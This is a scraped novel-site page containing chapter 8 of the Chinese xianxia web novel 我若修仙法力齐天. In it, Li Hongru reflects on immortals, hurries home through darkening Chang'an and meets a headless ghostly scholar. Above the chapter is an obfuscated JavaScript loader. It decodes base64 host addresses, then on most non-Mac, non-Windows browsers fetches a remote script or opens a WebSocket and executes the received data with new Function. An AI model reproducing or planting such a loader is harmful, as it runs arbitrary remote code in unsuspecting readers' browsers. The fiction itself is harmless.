笔趣阁

字:
关灯 护眼
笔趣阁 > 我若修仙法力齐天 > 第八章 修仙死路一条
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第八章 修仙死路一条

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
  这是一句万金油的话。
  只是袁守城知晓他来意,这倒是了不得的本领。
  李鸿儒看看自己。
  此时的自己只是十六岁,脸庞有着几分稚嫩,年龄尚还轻。
  若是想相命,如他这种小年轻大都是问求学和前程之事。
  李鸿儒想了一会,只觉自己找到了一些袁守城判断的依据。
  瞎子尚能察言观色,何况是袁守城这种相命的术士。
  他心中安慰了自己好一阵,袁守城给予的影响渐渐消除了下去。
  “仙庭!”
  当抹除自身的问题,他也偶有回想到两人低语时提及。
  袁守城和袁天纲探讨中的仙确实与他理想中的仙不同。
  倘若成仙只是充当仙庭中低贱的一员,需要接受管辖,这尘世间又能有多少大人物愿意去成仙。
  本是天骄,重新化成低贱中的一员。
  即便世界再好,那也难以安然处之。
  “修仙死路一条。”
  李鸿儒低声喃喃了袁天纲提及的一句话。
  这算是一桩意外所获,至少让李鸿儒知晓了一些认知以外的内容。
  此时夕阳西下,天色渐沉。
  想起李保国的家规,需要固定时间回家吃饭,李鸿儒的腿脚不由快了数分,渐渐奔行起来。
  从春熙大街踏出,又进入到另一条巷道。
  待得小跑上十余分钟,他已经渐渐远离了长安城的西门区域。
  街道没有路灯,显得有些阴暗。
  此时,一些店铺和民居开始点燃灯烛,映射出点点光辉来。
  大街上的人迅速稀少了下去。
  偶见一些人影,也是急匆匆而行,寻找落脚之处。
  除了每月特定的时日和每年的各种节日,长安城少有入夜之后的聚集之处。
  大多人都是入夜即睡。
  也有少部分有钱人早早寻了场地,开始寻欢作乐。
  但相对而言,此时的大环境还算非常清明,少有龌龊之事。
  一声入夜的打更声敲响,李鸿儒此时迈入的街道已经难见人影。
  夜色渐浓,此时离东市博望街还有半小时左右的路程。
  此番回去少不得又要被李保国骂两句,又要被客氏埋怨一番,李鸿儒想想这两口子就有些闷闷之感。
  但想到荣才俊这两天会捣鼓的那套《明庭经》,他心中又开心起来。
  再怎么说,这可能是一个新的起点,他依旧大道可期。
  低沉的脚步声响荡在深巷中,随后又渐渐远去。
  李鸿儒奔行之时,街上没了人影,入眼皆是黑暗。
  此时依靠记忆和一些高楼中微暗的光亮前行,视线有限,这让他不得不稍微放缓脚步,防止自己不小心撞到什么。
  快速行进之时,他只见前方一身穿白衣的秀士撑伞,在街头上一阵乱晃,不时摸着墙壁而行。
  这显然也是个入夜未归的倒霉蛋。
  “这儿是安居里街,前行百步进入到金穗街,你是打尖还是找回家的路,莫要走错……”
  李鸿儒好心提醒一句之时,只见那白衣秀士放下雨伞,身体微微扭转朝向了他。
  “还我命来!”
  低沉的声音响起。
  这也让李鸿儒头皮一阵发麻。
  当拿下了雨伞,他分明看见,这白衣秀士一颗脑袋已经不翼而飞。
  
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师